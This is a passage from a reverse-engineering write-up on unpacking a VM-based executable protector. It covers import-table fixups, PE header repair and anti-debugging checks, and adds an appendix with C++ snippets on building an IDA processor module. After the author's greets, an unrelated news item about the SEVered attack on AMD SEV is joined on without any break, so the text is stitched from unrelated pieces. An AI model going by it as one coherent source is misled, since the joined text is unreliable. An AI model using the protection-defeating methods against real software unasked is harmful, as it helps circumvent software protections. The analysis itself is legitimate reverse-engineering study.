In order to fix these up, we retrieve the address of the call from -747, and the import destination from -763. We then manually insert the correct instruction which calls into this IAT slot. Actually, due to my previously-described mistake, we first run the IAT address through the old IAT slot -> new IAT slot map before fixing the instruction.

4.4.4 Mov Instruction Fixup

Next, instructions of the form mov reg32, [dword from IAT] are fixed up by the protector in the same fashion as in the previous section. They are relatively addressed to point directly to the obfuscated stubs (whose addresses are fetched out of the IAT), instead of the direct addressing that was present in the original binary. The registers involved in this process are ESI, EDI, EBP, EBX, and EAX.

Stop and think for a second. So far, we’ve made the assumption that all imports are functions, but this is not always true. The MSVC CRT contains references to two imported data items. Trying to run a data import through the import-obfuscating procedure is an incorrect transformation and will always result in a crash. This is an Achilles’ heel of this protection.

The mov-instruction fixup is accomplished in much the same way as the call-instruction fixups. There are several idioms: for stolen functions, for regular functions, for EAX versus the other registers (as the instruction for EAX is five bytes, while the others are six bytes). The EAX-references are assumed to point to data and are fixed up directly instead of relatively.

Once again, extracting this information from the code sequences is not difficult to do statically, and I think I’m starting to develop RSI so I’ll skip the details here.

4.4.5 IAT Zeroing

After all of the references are correctly fixed up, the import addresses in the IAT are no longer needed, and are zeroed. We can ignore this step.

 4.5 The Rest of the Protection

As is usual in unpacking tasks, we must set the original entrypoint field of the PE header to the real entrypoint. We scan the disassembly listing for the instruction ‘stop’ and then statically backtrace to find the value of r0A.

    ROM:01049F05    mov     r0A, 1006AE0h
    ROM:01049F0D    stop

Finally, the NumberOfRVAsAndSizes field of the PE header has been set to -1 in order to confuse OllyDbg, so we should set that back to 0x10, the default. And while we’re at it, reduce the raw and virtual sizes of the last section, reduce the SizeOfImage, and truncate the last section in the executable. The final executable is exactly 1kb larger than the copy of notepad.exe which ships with Windows XP SP2.

After making all of the above modifications, the binary runs properly. Success!

 5.0 Comments On The Protection

It took a lot of work to unpack this protector, but ultimately, the static solution was both obvious and straightforward. On the other hand, dynamic dumping of this protector would be difficult, although still feasible.

 5.1 Problems With The Protection

This protection has a few problems in the theoretical sense. For one, it requires disassembling the binary: considering that the IAT is zeroed, _every_ reference to the IAT must be accounted for; if not, the program will simply crash. For example, if a trivial packer which XORed the code section, but left the imports alone, was applied first, all references would be missed and the binary would have no hope of running. This could be assuaged by not zeroing the original IAT (but still applying fixups on those which can be found) so that any non-found references continue to work properly.

Another problem is, of course, that disassembly isn’t perfect, and you could end up with all sorts of bugs if you just blindly replace what you think is a reference to the IAT if it is instead just plain old data, for instance.

Another problem is functions which have merged tails. If a function with a shared exit path is stolen, there are going to be problems.

Another problem, discussed in a previous section, is the assumption that imports will always point to functions and not data. This a faulty assumption, and will cause many failures.

All of that being said, if one assumes perfect disassembly (which is possible manually via IDA and/or full debugging information) and allows a blacklist of imports which are data, then this is a working protection, one which I expect will be quite potent after a few generations. By no means is this a «fire and forget» packer like UPX, but it can be made to work on a case-by-case basis.

 Appendix A: Anti-Debugging Tricks

There are 53 anti-debug mechanisms and checks in the VM, 49 of which can be broken automatically with either a tiny IDC script patching the bytecode directly, or a small patch to the VM harness. Of the remaining four, there are two which I’ve never heard of before (although I don’t do this type of work often), so it’s worth checking it out in the IDB, but I won’t ruin the surprises here. I didn’t look too heavily into those which could be broken automatically, so some of those descriptions in the IDB may be incorrect.

You may notice conditional jump instructions in the IDB which don’t have their jump targets resolved, such as the following:

    ROM:01035E90    cmp     r07, 1
    ROM:01035E98    jz      77026DDFh

At first I figured my processor module was buggy, and that this instruction was supposed to transfer control to a keyed memory region which the processor module had failed to locate. After inspection of the raw bytecode and a close look at the relevant VM harness code, in fact, this instruction will move the VM EIP to the immediate value 0x77026DDF, which will cause a reading access violation or undefined behavior during the next VM cycle, depending upon whether that’s a valid address. Hence, jumps with unresolved targets are anti-debugging tricks. TheHyper confirmed this afterwards in private correspondence.

 Appendix B: IDA Processor Module Construction

The main difference between writing a simple disassembler and writing an IDA processor module is that, instead of printing the disassembly immediately and moving on to the next instruction, information about each individual instruction and operand must be retained for later analysis and display.

For example, according to this VM’s instruction encoding, 0x20 0x?[0-0xf] means «get flags into specified register». Whereas in a trivial disassembler one might write this:

    case 0x20:
        printf("%lx:  getefl %s\n", address, decode_register(next_byte & 0xf));
        return 2; // size of instruction

In an IDA processor module, one must write something like this (in ana.cpp):

    case 0x20:
        cmd.itype    = TH_getefl; // instruction code is TH_getefl; this comes
                                  // from an enumeration
        cmd.Op1.type = o_reg;     // operand 1 is register
        cmd.Op1.reg  = TH_Regnum(4, ua_next_byte() & 0xf); // get register num
        cmd.Op1.dtyp = dt_dword;  // register is dword size
        cmd.Op2.type = o_void;    // operands 2+ do not exist
        length = 2;               // instruction size is 2
        break;

TH_getefl is an element of an enum (ins.hpp), which in turn has a text representation and flags (ins.cpp). The operand information is eventually retrieved and printed (out.cpp):

    case o_reg:
        OutReg( x.reg );
        break;

Clearly, writing an IDA processor module is a significant amount of work compared to writing a simple disassembler, and in the case of small portions of straight-line VM code, the latter approach (via IDC) is preferable. However, in the case of large amounts of VM code with non-trivial control flow structure, the traditional advantages of IDA (cross-reference tracking, comment-ability, ability to name locations, creation and application of structures, and the ability to run scripts and existing plugins) really begin to shine.

 B.1 Logical and Physical Divisions of an IDA Processor Module

It should be noted that, as with all C++ source code, physical divisions are irrelevant as long as all references can be resolved at link-time; however, the layout presented herein is consistent with the processor modules released in the IDA SDK, and also with the included processor module. Coincidentally, this information is laid out in the same order as specified by Ilfak in %idasdk%\readme.txt:

    "  Usually I write a new processor module in the following way:
            - copy the sample module files to a new directory
            - first I edit INS.CPP and INS.HPP files
            - write the analyser ana.cpp
            - then outputter
            - and emulator (you can start with an almost empty emulator)
            - and describe the processor & assembler, write the notify() function"

It should also be noted that I have written only one processor module and am not an expert on the subject. This information presented is correct as far as I am aware, but should not be considered authoritative. When in doubt, consult the processor module sources in the IDA SDK, inquire on the DataRescue forums, ask Ilfak, and buy the SDK support plan as a last resort.

 B.2 Assigning Each Mnemonic a Numeric Code and Textual Representation

The files herein are solely responsible for defining the opcodes used by the processor, their mnemonics specifically, in both numeric and textual forms.

B.2.1 Ins.hpp

This file contains an enum, called «nameNum» by Ilfak, which assigns each opcode to a number. This enum contains a special, unused leading entry ([processor]_null, set to zero), and a trailing entry ([processor]_last) denoting the beginning and the end of the enum.

    enum nameNum 
    {
      TH_null = 0,    // Unknown Operation
      TH_mov,         // Move                
      [...,]          // [more instructions here]
      TH_stop,        // Stop execution, return to x86
      TH_end          // No more instructions
    };

B.2.2 Ins.cpp

This file is the counterpart to the corresponding header file, which contains an array of instruc_t structures, which consist of a const char * (the mnemonic’s textual description) and a flags dword. The entries in this array correspond numerically to the values given in the enum. The flags specify the number of operands the instruction uses/changes, whether the instruction is a call/switch jump, and whether to continue disassembling after this instruction is encountered (e.g. return instructions and unconditional jumps do not generally transmit control flow to the following instruction).

    instruc_t Instructions[] = {
      { "",                     0             },  // Unknown Operation
      
      // GROUP 1:  Two-Operand Arithmetic Instructions
      { "mov" ,   CF_USE2 | CF_USE1 | CF_CHG1 },  // Move
      [{...,...},]                                // [more instructions]
      { "stop"   ,                    CF_STOP }   // Stop execution, return to x86
    
    };

 

 B.3 Assigning Each Register a Numeric Code and Textual Representation

B.3.1 Reg.hpp

This file contains an enum, whose real entries begin at 0 (unlike previously- described enums with a bogus leading entry), consisting of the legal registers supported by the processor. As IDA takes into account the concept of segmentation, you will need to define fake code and data segment registers if your processor does not use them.

    enum TH_regs
    {
        rESPb = 0,
        rESPw,
        rESP,
        [...,]
        r0F,
        rVcs, // fake registers for segmentation
        rVds, // fake
        rEND
    };

B.3.2 [Processor].hpp This file contains an array of const char *s which map the elements of the enum described in the previous subsection to a textual representation thereof.

    static char *TH_regnames[] =
    {
        "rESPb",
        "rESPw",
        "rESP",
        [...,]
        "r0F"
    };

 

 B.4 Analyzing an Instruction And Filling IDA’s «cmd» Structure

The main disassembler function in an IDA processor module is called int ana() and lives in ana.cpp. This function takes no parameters, and instead retrieves the relevant bytes to decode via the functions ua_next_byte(), _word(), and _long().

This function, or collection of functions as the case may be, is responsible for:

  • Setting cmd.itype to the correct value from the nameNum enum described in section B.2.1.
  • Setting the fields of cmd.Op[1-6] to describe the types of operands (registers, immediates, addresses, etc.) used by this instruction.
  • Returning the length of the instruction.

An example from the included processor module:

    case 0x1d:
        cmd.itype     = TH_vfree;       // virtualalloc'ed memory free 
        cmd.Op1.type  = o_imm;          // type of operand 1 is immediate
        cmd.Op1.value = ua_next_long(); // value = memory key to free
        cmd.Op1.dtyp  = dt_dword;       // 4-byte memory key
        length = 5;                     // 5 bytes, 1 for opcode, 4 for operand
        break;

The cmd structure ties together the functions described in the next two sections: these functions do not take arguments, and instead retrieve information from the cmd structure in order to perform their duties.

 B.5 Displaying Operands

Out.cpp is responsible for providing two functions, bool outop( op_t & ) and void out(). out() is responsible for outputting the mnemonic and deciding whether to output the operands.

There’s a bit of subtlety here: processors which use conditional execution, for example ARM and the instruction MOVEH, may have a single nameNum/Instructions entry for an opcode («MOV»), and the logic for prepending «-EH» to the mnemonic exists in out(). I have not encountered this while coding a processor module and cannot speak about it.

One thing to notice about the code below is how gl_comm is set to 1 every time out() is called. If you do not do this, you will not see comments in the disassembly. Figuring this required an email to Ilfak. Frankly, it’s puzzling why displaying comments is not the default behavior, but this is the reality, so be sure to set this variable.

    void out( void )
    {
        char buf[MAXSTR];
        init_output_buffer(buf, sizeof(buf));
        OutMnem();
        
        if( cmd.Op1.type != o_void )
            out_one_operand( 0 );    // output first operand
        
        if( cmd.Op2.type != o_void ) // do we have a second operand?
        {
            out_symbol( ',' );       // put a ", " in the output
            OutChar( ' ' );
            out_one_operand( 1 );    // output second operand
        }
        
        term_output_buffer();
    
        // attach a possible user-defined comment to this instruction
        gl_comm = 1;
                                              
        MakeLine( buf );
    }

The other function, bool outop(op_t &), is responsible for translating the contents of the op_t structure it is given into a textual description of that operand. The structure of this function is a simple switch statement on the op_t.type field. This function should be written concurrently with ana().

The output takes place through a number of functions exported from ua.hpp in the SDK: these functions tend to begin with «Out» or «out_» (out_register, OutValue, out_keyword, out_symbol, etc).

All in all, coding this function is mainly trivial. Here’s one of the more complicated operand types from the included processor module:

    case o_displ:
        out_symbol('[');
        OutReg( x.phrase );
        out_symbol('+');
        OutValue(x, OOF_ADDR );
        out_symbol(']');
        break;

 

 B.6 Creating Cross-References

Most, but not all, instructions implicitly transfer control flow to the next instruction, and create no other cross-references. Some instructions like «ret» and «jmp» do not reference the next instruction. Other instructions, like «call» and conditional jumps, create additional references to the address(es) targeted. Still other instructions create references to data variables specified by immediate values.

This knowledge is not inherent in the depiction of the instruction set which has been developed thus far, and must be specified programatically. This is the responsibility of the int emu() function, which resides in emu.cpp, the smallest .cpp file in the supplied processor module.

    int emu( void )
    {
      ulong Feature = cmd.get_canon_feature();
    
      if((Feature & CF_STOP) == 0) // does this instruction pass flow on?
          ua_add_cref( 0, cmd.ea+cmd.size, fl_F ); // yes -- add a regular flow
    
      if(Feature & CF_USE1) // does this instruction have a first operand?
          TouchArg(cmd.Op1, 0); // process it 
    
      if(Feature & CF_USE2)
          TouchArg(cmd.Op2, 1);
    
      return 1; // return value seems to be unimportant
    }
    
    // "emulation" performed on a given op_t, see emu()
    static void TouchArg( op_t &x, bool bRead )
    {
        switch( x.type )
        {
        case o_vmmem:
            ua_add_cref( 0, get_keyed_address(x.addr), 
                         InstrIsSet(cmd.itype, CF_CALL) ? fl_CN : fl_JN);
            // add a code reference to the targeted address, either a call or a 
            // jump depending on whether that instruc_t's flags has CF_CALL set.
            break;
        }
    }

 

 B.7 Declaring IDA’s Relevant Processor Module Structures

The bulk of what remains is the creation of structures which are directly or indirectly exported by the processor module.

B.7.1 asm_t Structure

This structure defines an «assembler» which determines what the disassembly listing should look like. Specifically, what the syntax is for declaring data, origins, section boundaries, comments, strings, etc.

Since we don’t need to re-assemble virtual machine code (in the case of VMs found in protectors), the choices made here are immaterial, and this structure can be created once and re-used for all VM processor modules.

B.7.2 Function Begin and End Sequences

Both of these are optional. IDA employs both a linear-sweep and a flow-following method of disassembly: on the first pass, it marks all entrypoints as code, and then scans the raw bytes looking for the function begin sequences (such as push ebp / mov ebp, esp). These sequences can be specified in the processor module; however, when dealing with a throwaway VM, they aren’t so important, because you’re unlikely to know a priori what a function prologue looks like.

B.7.3 Processor Notification Event Handler

This is where my ignorance of processor module construction is most transparent. This function is called by the kernel upon certain events being triggered; such events include closing the database, opening an existing IDB, creating a new IDB, changing the processor module type, creating a new segment, and so on. A complete list of events can be found in idp.hpp.

For the creation of this processor module, I did not need to utilize many processor events, so I did not explore this further.

B.7.4 processor_t Structure

This is the «main» structure employed by the processor module, as plugin_t is the main structure employed by a plugin. In this structure, the pieces gathered in the previous sections are stitched together.

The processor module must know:

  • The numeric ID of the processor module (custom-defined).
  • The long and short name of the processor module. I.e. metapc and pc respectively. There’s an important point here which isn’t documented: the makefile has a line called «DESCRIPTION» which MUST be in the format «[long name]:[short name]». Failure to ensure this means that the processor module will not be shown in the list of valid processor modules. Without knowing this, you’ll be mailing Ilfak for advice, like I did.
  • The assembler(s) available. We’ll only need the one we defined in B.7.1.
  • A function pointer to int ana() (see B.4).
  • A function pointer to int emu() (see B.6).
  • A function pointer to void out() and bool outop(op_t &) (see B.5).
  • A function pointer to int notify(processor_t::idp_notify, …) (see B.7.3).
  • The number of registers, and a pointer to the const char * array of register names (both laid out in B.3).
  • The function begin and end sequences described in B.7.2. We can set these to NULL.
  • The number of mnemonics, and a pointer to the instruc_t array of mnemonic names (both laid out in B.2).

 

 Appendix C: Obligatory Greets

TheHyper: Very innovative, good work! You keep making them, I’ll keep breaking them.

blorght and Zen: Two of my favorite people, with or without the charming accents. Way too talented and more than a step or two over the edge. Stay just the way you are: I love both of you.

Nicholas Brulez: My bro the PE killer 🙂 I hope we get to meet up again soon. I don’t have to tell you to keep kicking ass, mate.

Neural Noise: One of my best friends, and a very gracious host. I can’t wait to meet up again in the world’s most alluring mafia-run slum that is Napoli (what a crazy city!). You bring the beautiful women, and I’ll bring my bummy self, and we can have panic attacks in traffic waititng for the party to start ;-). Stay cool, man! 🙂

Solar Eclipse: Congrats on the Pietrek thing!

spoonm: Thanks for the crash space and the informed conversation, and I’m looking forward to see what you publish next, too.

Pedram: For being the modern-day Fravia of OpenRCE and editing this tripe.

Rossi: For the much-needed proofreading.

lin0xx: Calm down!

LeetNet, kw, and upb: Self-explanatory.

Skape: For uninformed and for rocking.

Finally, to all true friends everywhere: I couldn’t do it without you.

Researchers Defeat AMD’s SEV Virtual Machine Encryption

Researchers defeat AMD’s Secure Encrypted Virtualization (SEV), demonstrating #SEVered attack that could allow malicious hypervisor to steal plain-text data from an encrypted virtual machine.

German security researchers claim to have found a new practical attack against virtual machines (VMs) protected using AMD’s Secure Encrypted Virtualization (SEV) technology that could allow attackers to recover plaintext memory data from guest VMs.

AMD’s Secure Encrypted Virtualization (SEV) technology, which comes with EPYC line of processors, is a hardware feature that encrypts the memory of each VM in a way that only the guest itself can access the data, protecting it from other VMs/containers and even from an untrusted hypervisor.

Discovered by researchers from the Fraunhofer Institute for Applied and Integrated Security in Munich, the page-fault side channel attack, dubbed SEVered, takes advantage of lack in the integrity protection of the page-wise encryption of the main memory, allowing a malicious hypervisor to extract the full content of the main memory in plaintext from SEV-encrypted VMs.

Here’s the outline of the SEVered attack, as briefed in the paper: SEVered: Subverting AMD’s Virtual Machine Encryption

«While the VM’s Guest Virtual Address (GVA) to Guest Physical Address (GPA) translation is controlled by the VM itself and opaque to the HV, the HV remains responsible for the Second Level Address Translation (SLAT), meaning that it maintains the VM’s GPA to Host Physical Address (HPA) mapping in main memory.

«This enables us to change the memory layout of the VM in the HV. We use this capability to trick a service in the VM, such as a web server, into returning arbitrary pages of the VM in plaintext upon the request of a resource from outside.»

«We first identify the encrypted pages in memory corresponding to the resource, which the service returns as a response to a specific request. By repeatedly sending requests for the same resource to the service while re-mapping the identified memory pages, we extract all the VM’s memory in plaintext.»

During their tests, the team was able to extract a test server’s entire 2GB memory data, which also included data from another guest VM.

In their experimental setup, the researchers used a with the Linux-based system powered by an AMD Epyc 7251 processor with SEV enabled, running web services—the Apache and Nginx web servers—as well as an SSH server, OpenSSH web server in separate VMs.